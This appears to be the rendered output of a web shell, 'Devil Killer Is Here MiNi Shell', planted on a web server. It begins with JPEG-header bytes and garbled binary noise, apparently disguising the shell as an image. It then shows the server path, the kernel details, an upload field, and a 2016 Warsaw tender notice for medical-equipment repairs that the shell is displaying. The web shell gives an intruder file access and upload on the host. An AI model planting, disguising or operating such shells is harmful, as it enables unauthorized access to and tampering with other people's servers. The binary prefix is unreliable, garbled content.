JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160915/309103-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 309103 - 2016
              z dnia 2016-09-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Przeglądy i naprawy sprzętu medycznego.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Centrum Leczniczo-Rehabilitacyjne i Medycyny Pracy ATTIS Sp. z o.o., krajowy numer identyfikacyjny
              1644180300000, ul.
              ul. Górczewska 
              89,
              01401  
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              223 211 470, e-mail
              przetargi@attis.com.pl, faks
              223 211 406.
              <br />
              Adres strony internetowej (URL): www.attis.com.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Spółka Prawa Handlowego (art. 3 ust. 1 pkt. 3 lit. a) ustawy Pzp</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.attis.com.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.attis.com.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą lub osobiscie<br />
                Adres:
                <br />Centrum Leczniczo  Rehabilitacyjne i Medycyny Pracy ATTIS Sp. z o.o. ul. Górczewska 89, 01-401 Warszawa Sekretariat- p. 196.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przeglądy i naprawy sprzętu medycznego.<br /><b>Numer referencyjny: </b>FZP/ZP-26/U/17/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b>50421000-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 24<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek, jeżeli wykaże, że należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również należycie wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 3 (trzy) zamówienia odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. obejmujące przeglądy, naprawy i kalibracje sprzętu medycznego, o wartości co najmniej:
-dla pakietu nr 1		4 500,00 zł brutto
-dla pakietu nr 2		37 500,00 zł brutto
-dla pakietu nr 3		11 500,00 zł brutto
-dla pakietu nr 4a		4 500,00 zł brutto
-dla pakietu nr 4b		6 500,00 zł brutto
-dla pakietu nr 4c		7 000,00 zł brutto
-dla pakietu nr 5		62 000,00 zł brutto
-dla pakietu nr 6a		13 000,00 zł brutto
-dla pakietu nr 6b		12 000,00 zł brutto
-dla pakietu nr 6c		28 000,00 zł brutto
-dla pakietu nr 7		3 500,00 zł brutto
(w przypadku, gdy wartość umowy została określona w walucie innej niż złoty przeliczenie nastąpi wg średniego kursu złotego ogłoszonego przez Prezesa NBP i obowiązującego w dniu podpisania umowy na realizację zamówienia.
c.2.	Wykonawca spełni warunek,  jeżeli wykaże, że dysponuje co najmniej jedną upoważnioną osobą posiadającą kwalifikacje w zakresie dokonywania napraw, przeglądów i wszelkich działań niezbędnych do orzekania o przydatności do użytkowania urządzeń z danego pakietu.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
b)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
c)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	Wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert Wzór wykazu stanowi Załącznik nr 4 do SIWZ.
b)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie dysponowania tymi osobami, którego wzór znajduje się w załączniku nr 8 do SIWZ. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokumenty te mogą złożyć łącznie<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Wykonawca, najpóźniej w dniu złożenia oferty a przed upływem terminu składania ofert, winien wnieść wadium, w wysokości wynoszącej:
Część  pakiet nr 1  brak,
Część  pakiet nr 2 - 760,00 zł (siedemset sześćdziesiąt złotych),
Część  pakiet nr 3 240,00 zł (dwieście czterdzieści złotych),
Część  pakiet nr 4a  brak,
Część  pakiet nr 4b  brak,
Część   pakiet nr 4c  brak,
Część  pakiet nr 5  1 250,00 zł (jeden tysiąc dwieście pięćdziesiąt złotych),
Część  pakiet nr 6a  270,00 zł (dwieście siedemdziesiąt złotych),
Część  pakiet nr 6b   250,00 zł. (dwieście pięćdziesiąt złotych),
Część  pakiet nr 6c  570,00 zł (pięćset siedemdziesiąt złotych)
Część  pakiet nr 7  brak.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3)	gwarancjach bankowych; 
4)	gwarancjach ubezpieczeniowych; 
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt. 2 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r., Nr 0, poz. 359 z późn. zm.).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
14 1240 2034 1111 0010 1547 6334 z adnotacją: "Wadium - nr sprawy: FZP/ZP-26/U/17/16, wadium wniesione w pieniądzu musi wpłynąć na konto zamawiającego do upływu terminu składania ofert.
4.	Potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagane jest dołączenie oryginału dokumentu, a w przypadku wpłaty pieniężnej  kopii dowodu dokonania przelewu.
5.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.
6.	Wadium wnoszone w formach określonych w pkt. 2.2-5, musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym: 
1)	w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań,
2)	dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo i na pierwsze żądanie,
3)	dokumenty te zostaną złożone w oryginale.
7.	Dalsze postępowanie dotyczące przechowywania, zwrotu bądź zatrzymania wadium reguluje art. 46 ustawy.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
